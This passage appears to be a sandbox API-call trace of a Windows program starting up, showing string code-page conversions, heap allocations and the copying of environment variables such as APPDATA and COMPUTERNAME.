¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0106.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ea08, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0106.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f0c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ2\x0f÷%\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0106.292] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0106.292] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0106.366] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.378] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1f) returned 0x62eaa0 [0106.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x62eaa0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0106.384] GetLastError () returned 0x0 [0106.384] SetLastError (dwErrCode=0x0) [0106.384] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4) returned 0x6311e8 [0106.384] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6311e8) returned 0x4 [0106.384] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6311e8, Size=0x8) returned 0x6311e8 [0106.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0106.384] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x36) returned 0x6311f8 [0106.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6311f8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0106.384] GetLastError () returned 0x0 [0106.384] SetLastError (dwErrCode=0x0) [0106.384] GetLastError () returned 0x0 [0106.384] SetLastError (dwErrCode=0x0) [0106.384] GetLastError () returned 0x0 [0106.385] SetLastError (dwErrCode=0x0) [0106.424] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6311e8) returned 0x8 [0106.424] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6311e8, Size=0xc) returned 0x631238 [0106.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0106.424] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x37) returned 0x631250 [0106.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x631250, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0106.424] GetLastError () returned 0x0 [0106.424] SetLastError (dwErrCode=0x0) [0106.424] GetLastError () returned 0x0 [0106.424] SetLastError (dwErrCode=0x0) [0106.424] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631238) returned 0xc [0106.425] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631238, Size=0x10) returned 0x631238 [0106.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0106.425] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x6253a0 [0106.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6253a0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631238) returned 0x10 [0106.425] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631238, Size=0x14) returned 0x631290 [0106.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0106.425] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x31) returned 0x6312b0 [0106.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6312b0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0106.425] GetLastError () returned 0x0 [0106.425] SetLastError (dwErrCode=0x0) [0106.425] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631290) returned 0x14 [0106.426] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631290, Size=0x18) returned 0x631290 [0106.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17) returned 0x6312f0 [0106.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6312f0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.426] GetLastError () returned 0x0 [0106.426] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631290) returned 0x18 [0106.427] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631290, Size=0x1c) returned 0x631310 [0106.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.427] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x62a678 [0106.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x62a678, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.427] GetLastError () returned 0x0 [0106.427] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] GetLastError () returned 0x0 [0106.428] SetLastError (dwErrCode=0x0) [0106.428] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x1c [0106.428] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x20) returned 0x631310 [0106.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.429] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x631290 [0106.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x631290, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.429] SetLastError (dwErrCode=0x0) [0106.429] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x20 [0106.430] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x24) returned 0x631310 [0106.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.430] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xd) returned 0x62e2b8 [0106.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x62e2b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.430] GetLastError () returned 0x0 [0106.430] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.431] SetLastError (dwErrCode=0x0) [0106.431] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x24 [0106.432] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x28) returned 0x631310 [0106.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.432] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x25) returned 0x62a6a8 [0106.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x62a6a8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.432] GetLastError () returned 0x0 [0106.432] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.433] SetLastError (dwErrCode=0x0) [0106.433] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x28 [0106.434] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x2c) returned 0x631310 [0106.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0106.434] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x39) returned 0x6253e8 [0106.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6253e8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.434] GetLastError () returned 0x0 [0106.434] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.435] GetLastError () returned 0x0 [0106.435] SetLastError (dwErrCode=0x0) [0106.436] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x2c [0106.436] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x30) returned 0x631310 [0106.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.436] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x631348 [0106.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x631348, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] 